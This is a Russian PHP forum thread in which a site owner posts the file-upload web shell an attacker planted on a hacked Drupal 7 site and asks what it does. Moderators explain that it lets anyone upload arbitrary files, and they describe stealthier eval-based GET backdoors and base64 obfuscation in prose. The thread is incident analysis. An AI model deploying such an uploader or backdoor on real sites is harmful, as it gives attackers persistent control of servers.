За последние 24 часа нас посетили 17464 программиста и 1724 робота. Сейчас ищут 928 программистов ...

Код от хакера

Тема в разделе "Прочие вопросы по PHP", создана пользователем inkindly, 5 авг 2015.

  1. inkindly

    inkindly Новичок

    С нами с:
    17 авг 2014
    Сообщения:
    4
    Симпатии:
    0
    Здравствуйте, уважаемые профессионалы и любители РНР.
    Так уж получилось, что по непонятным причинам сайт на моей новой работе оказался взломан. Хакер сменил логин и пароль, а также создал страницу силами CMS Drupal 7, на которой разместил этот код

    Код (Text):
    1. <?php
    2. echo '<center><font color="Red" size="4">';
    3. /// Script Upload By Osamaa kaboo \\\
    4. if(isset($_POST['Submit'])){
    5.     $filedir = "";
    6.     $maxfile = '2000000';
    7.     $mode = '0644';
    8.     $userfile_name = $_FILES['image']['name'];
    9.     $userfile_tmp = $_FILES['image']['tmp_name'];
    10.     if(isset($_FILES['image']['name'])) {
    11.         $qx = $filedir.$userfile_name;
    12.         @move_uploaded_file($userfile_tmp, $qx);
    13.         @chmod ($qx, octdec($mode));
    14. echo"<center><b>Done ==> $userfile_name</b></center>";
    15. }
    16. }
    17. else{
    18. echo'<form method="POST" action="#" enctype="multipart/form-data"><input type="file" name="image"><br><input type="Submit" name="Submit" value="Upload"></form>';
    19. }
    20. echo '</center></font>';
    21. ?>
    Хочется узнать, что делает этот код. Заранее спасибо
     
  2. Ganzal

    Ganzal Суперстар
    Команда форума Модератор

    С нами с:
    15 мар 2007
    Сообщения:
    9.893
    Симпатии:
    965
    это форма для загрузки файла на сервер. ну а загруженный файл может быть с любым алгоритмом.
     
  3. Fell-x27

    Fell-x27 Суперстар
    Команда форума Модератор

    С нами с:
    25 июл 2013
    Сообщения:
    12.156
    Симпатии:
    1.771
    Адрес:
    :сердА
    Измельчал хацкер, поглупел, стал делать странички через рульки CMS для заливки зловредов, эхехе. В мое время куда-то в проект кидался скриптик, который принимал GET с определенным ключом, после чего остальные данные в GET-е прокручивал через EVAL. Тихо, без пыли, без засветов в админке.
     
  4. Ganzal

    Ganzal Суперстар
    Команда форума Модератор

    С нами с:
    15 мар 2007
    Сообщения:
    9.893
    Симпатии:
    965
    не говори. этот же код да в бейс64 да под эвал - уже уровень выше)))) детишки шалят наверное
     
  5. Fell-x27

    Fell-x27 Суперстар
    Команда форума Модератор

    С нами с:
    25 июл 2013
    Сообщения:
    12.156
    Симпатии:
    1.771
    Адрес:
    :сердА
    Не иначе. Ты глянь на этот стыд:
    Красненький шрифтик и кричалка с ником. Мол "эй, эй, это я! Вот он я! Я великий!" Тьфу...